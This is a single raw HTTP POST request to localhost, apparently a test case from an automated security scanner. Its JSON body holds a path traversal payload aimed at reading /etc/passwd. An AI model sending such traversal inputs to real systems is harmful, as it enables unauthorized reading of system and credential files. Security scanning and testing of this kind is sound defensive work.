POST /pathtraver/BS00080 HTTP/1.1
Host: localhost
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
BS00101: BS00101
Cookie: BS00080=BS00080
Referer: http://localhost/
Content-Type: application/json
scannerauth:cd117e0a9365670f19c768032f8dabfe
Content-Length: 42

{"BS00080":"../../../../../../etc/passwd"}